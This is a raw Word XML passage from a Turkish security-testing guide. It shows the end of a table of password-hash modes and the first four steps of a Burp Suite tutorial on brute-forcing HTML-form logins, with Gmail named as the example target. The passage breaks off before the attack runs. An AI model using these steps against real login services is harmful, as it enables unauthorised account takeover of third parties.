      </w:r>
    </w:p>
    <w:p w14:paraId="3A88A990" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">110 = sha1($pass.$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDD1CE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">120 = sha1($salt.$pass) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C6932C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">130 = sha1(unicode($pass).$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408AF76" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">140 = sha1($salt.unicode($pass)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C402FB7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">300 = MySQL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15733E0C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">400 = phpass, MD5(Wordpress), MD5(phpBB3) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01201F8A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866A80E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">900 = MD4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A0066" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1000 = NTLM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE09CB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1100 = Domain Cached Credentials, mscash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA8831" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1400 = SHA256 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7724E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1410 = sha256($pass.$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E48DE25" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1420 = sha256($salt.$pass) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F1A0B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1500 = descrypt, DES(Unix), Traditional DES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316E15B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1600 = md5apr1, MD5(APR), Apache MD5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD00CDE" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1700 = SHA512 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A6BF5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1710 = sha512($pass.$salt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C4F2C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1720 = sha512($salt.$pass) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68563B86" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1800 = sha512crypt, SHA512(Unix) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F367D23" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2100 = Domain Cached Credentials2, mscash2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B9269" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2400 = Cisco-PIX MD5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DCB929" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2500 = WPA/WPA2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB82CD8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2600 = Double MD5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D10DF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3000 = LM </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CE98B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3100 = Oracle 7-10g, DES(Oracle) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB84B9F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3200 = bcrypt, Blowfish(OpenBSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239C93B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9DEA9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc430104862"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:t>HTML Form Auth. Korumalı Sayfalara Yönelik Kaba Kuvvet Parola Denemeleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="00C37FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FC78D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78670AA4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaç: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web uygulamalarında basit kimlik doğrulama kullanan sayfalara yönelik kaba kuvvet saldırıları yaparak doğru kullanıcı parola elde etmek. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24102C0B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanılan Araçlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7669DB" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">burbsuite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7B174" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fireforce </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF8024" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7213A61D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adımlar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D899D9" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Burbsuite kullanarak html form kullanan kimlik doğrulama sayfalarına yönelik brute force saldırısı yapma; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9308A6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19BFBB06" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web browser (firefox) üzerinden proxy ayarları yapılır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B768C40" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AD3938" wp14:editId="677901B7">
            <wp:extent cx="5512435" cy="251904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2519045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF607F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2355BBAF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BurpSuite uygulaması çalıştırılır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0DF05B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2843CAA9" wp14:editId="4BC26E90">
            <wp:extent cx="5760720" cy="2288816"/>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88816"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CAAD59" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A690474" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79DC96CD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D187ADA" wp14:editId="2F2DF6A8">
            <wp:extent cx="5760720" cy="4113067"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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13067"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E922D50" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E10CD5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB63F1E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kaba kuvvet saldırı yapılacak web sayfası(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>örnekte</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gmail seç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ildi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) açılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A01F6B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="115C4F72" wp14:editId="1D6075AC">
            <wp:extent cx="5512435" cy="2493010"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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435" cy="2493010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E20438" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C8A299" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4. Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Yukarıdaki gibi kullanıcı adı ve şifre girildikten sonra bu oluşan trafik proxy olarak kullanılan burpsuite uygulaması üzerinden geçecektir. Yukarıdaki ekranda “Sign in” demeden önce isteği yakalaması için burp üzerinden aşağıdaki gibi intercept is on yapılır. Ve ardından “Sign in” butonuna basılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3012A1A6" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37FB0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="188F163D" wp14:editId="4454D1F7">
            <wp:extent cx="5512435" cy="3898900"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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435" cy="3898900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D01D84" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00C37FB0" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
